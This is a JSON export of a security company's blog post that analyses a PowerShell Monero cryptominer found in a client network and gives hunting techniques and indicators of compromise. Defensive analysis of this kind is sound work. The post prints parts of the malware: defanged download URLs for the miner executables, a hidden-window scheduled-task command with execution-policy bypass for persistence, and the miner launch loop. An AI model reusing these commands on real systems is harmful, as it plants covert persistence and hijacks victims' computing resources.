{"id":2797,"date":"2024-09-25T20:00:25","date_gmt":"2024-09-25T20:00:25","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=2797"},"modified":"2025-07-29T06:39:41","modified_gmt":"2025-07-29T06:39:41","slug":"powershell-monero-miner-tunnelling-under-traditional-anti-virus","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/powershell-monero-miner-tunnelling-under-traditional-anti-virus\/","title":{"rendered":"Powershell Monero Miner tunnelling under traditional anti-virus"},"content":{"rendered":"
\n
\"\"<\/figure>\n<\/div>\n\n\n

Although the crypto-currency hype now seems to be dying down, the emergence of a popular new currency in mid-2017 inspired hackers to develop malicious tools to harvest the new coin \u2013 Monero (XMR).<\/p>\n\n\n\n

In fact, some of the mining malware released in the wild more than a year ago \u2013 when Monero\u2019s popularity really took off \u2013 is still successfully being used in attacks today.<\/p>\n\n\n\n

Late last month, LMNTRIX researchers discovered a PowerShell script that silently downloaded Monero miner programs designed to exploit the victim\u2019s CPU. <\/p>\n\n\n\n

It was found during LMNTRIX Hunt activities in one of our client\u2019s networks. During Hunt engagements, our analysts methodically pursue and evict adversaries inside a network, all without relying on IOCs. As the malware was able to bypass the client\u2019s traditional defences, analysts had to monitor suspicious activity in real-time in order to isolate the malware\u2019s location before removing it.<\/p>\n\n\n\n

In this case, using PowerShell to deploy the malware enabled the attackers to maintain a level of persistence our analysts had not previously seen in the coin miner malware family.   <\/p>\n\n\n\n

Sample details<\/strong><\/p>\n\n\n\n

File Hash: 3bf089f79e6f0fe0ad0f6ff6aab1d063e327f88894e21d4a8b424a10cb6806d1<\/p>\n\n\n\n

File Size: 1 KB<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Figure 1. Current VT detection for this sample<\/em><\/p>\n\n\n\n

At the time of writing, only 10 out of 57 AV vendors listed in VirusTotal were detecting this sample as malicious. This is despite the fact it has been in the wild for more than a year:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Figure 2. Sample Submission history<\/em><\/p>\n\n\n\n

Sample code analysis<\/strong><\/p>\n\n\n\n

This malware\u2019s script was very precise and succinct. First, it downloaded two PE files designed to carry out the Monero mining function.<\/p>\n\n\n\n

$url = \u201chxxps:\/\/x4ndj[.]github[.]io\/files\/minerd.exe”<\/p>\n\n\n\n

$surl = \u201chxxps:\/\/x4ndj[.]github[.]io\/files\/OneDrive.exe\u201d<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Figure 3. Miner files – downloading URL<\/em><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

 

Figure 4. URL result \u2013 minerd.exe<\/em>

As we see above, only two AV vendors flagged these URLs as malicious despite the strain\u2019s first appearance more than a year ago.

Code structure and functionality<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Figure 5. Malware\u2019s complete script cycle <\/em>

\u25cf    First, the script downloads the miner executables, both of which are saved into the TEMP location. These executables are saved with seemingly legitimate names; OneDrive.exe<\/strong> and yam.exe<\/strong>.

\u25cf    The script then copies itself to the user\u2019s home directory in order to maintain persistence. yam.exe<\/strong> is also copied to Tkinstaller.exe<\/strong> within the TEMP folder.

\u25cf    A scheduled task is then created to invoke itself from the user\u2019s home directory every six minutes:<\/p>\n\n\n\n

SchTasks.exe \/Create \/SC MINUTE \/TN “User_Feed_Synchronization-{9A285FA7A2A0A-F17D-47B82-9343F9-A22AKFS2A0}” \/TR “PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File $HOME\\xxxx.ps1” \/MO 6 \/F<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

\u25cf    While in loop condition, the malware checks whether mining is running or not:<\/p>\n\n\n\n

        echo “Not running”
        cmd.exe \/C $env:TMP\\OneDrive.exe
        cmd.exe \/C $env:TMP\\Tkinstaller.exe -c x -M stratum+tcp:\/\/address:x@xmr(.)crypto-pool(.)fr:443\/xmr      } else {
        echo “Running”
    }
    Start-Sleep 40
}<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

This helps the script determine whether the system is mining or not. If not, it executes the whole PowerShell script. The whole process repeats every time the scheduled task is run.

Hunt Techniques<\/strong>

Our dedicated Hunt team used several techniques to unearth the malware as it had successfully bypassed the client\u2019s traditional perimeter controls. Despite the strain\u2019s advanced evasion techniques, LMNTRIX analysts were able to zero-in on its location by monitoring the following unusual activities:

\u2022    PowerShell Execution<\/strong> \u2013 Logging PowerShell commands is a fundamental tactic in the detection of anomalous command\/script execution. By enabling Script Block Logging on system or via GPO, very granular logs can be collected. When used in malware, PowerShell is typically used as a way to evade detection and maintain persistence \u2013 as defined in MITRE ATTACK Matrix<\/a>. 

\u2022     \u201cschtasks.exe\u201d Execution<\/strong> \u2013 By seeking out suspicious schtasks, incident responders were able to identify the suspicious task which was scheduled to execute.  schtasks.exe provide the creation, modification, and running of scheduled tasks on a local or remote computer. When used by attackers, tasks are given genuine looking task names (OneDrive.exe). In this case, it was a dead giveaway as the next run (if OneDrive.exe was legitimate) should\u2019ve been \u2018Task Run\u2019. As this wasn\u2019t the case, it was clear a malicious task was being scheduled.

\u2022    Suspicious Run Locations <\/strong>\u2013 Attackers often place their malicious binaries in unusual locations, such as, RECYCLER, SystemVolumeInformation, %TEMP%, %APPDATA%, %LOCALAPPDATA%, %USERPROFILE% .etc. Analysts monitored such uncommon directories and were able to confirm the malware\u2019s location. This can also be achieved by whitelisting the directories from which authorised and legitimate binaries should be executed. In this case, the malware was executing from the TMP location \u2013 an immediate red flag. 

\u2022    Processes Spawning cmd.exe <\/strong>\u2013 Parent processes that spawn command prompts may be suspicious in nature based on the number of occurrences, the name of the parent process, or the execution directory. Generally, cmd is legitimately invoked by explorer.exe, logon scripts, administrative tools, and automated programs. In this case our analysts saw the parent process, powershell.exe, spawn cmd.exe \u2013 another red flag.

Indicators of Compromise <\/strong>

\u2022    Hash:<\/strong> 3bf089f79e6f0fe0ad0f6ff6aab1d063e327f88894e21d4a8b424a10cb6806d1

\u2022    URL:<\/strong> hxxps:\/\/x4ndj[.]github[.]io\/files\/minerd.exe

\u2022    URL:<\/strong> hxxps:\/\/x4ndj[.]github[.]io\/files\/OneDrive.exe

Conclusion<\/strong>

PowerShell scripts are mostly used by system administrators to automate tasks which might involve downloading certain files, creating scheduled tasks, and other commands. This is the primary reason why most vendors on VirusTotal did not identify the script as malicious. It is recommended to have a Threat Hunting dashboard ready for relevant analytics from known TTPs (as shown in the \u2018Threat Hunting\u2019 section) in order to identify the threats that fly below the traditional AV radar.<\/p>\n","protected":false},"excerpt":{"rendered":"

Although the crypto-currency hype now seems to be dying down, the emergence of a popular new currency in mid-2017 inspired hackers to develop malicious tools to harvest the new coin – Monero (XMR). In fact, some of the mining malware released in the wild more than a year ago – when Monero’s popularity really took […]<\/p>\n","protected":false},"author":1,"featured_media":2805,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-2797","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2797","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/comments?post=2797"}],"version-history":[{"count":5,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2797\/revisions"}],"predecessor-version":[{"id":4313,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2797\/revisions\/4313"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media\/2805"}],"wp:attachment":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media?parent=2797"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/categories?post=2797"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/tags?post=2797"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}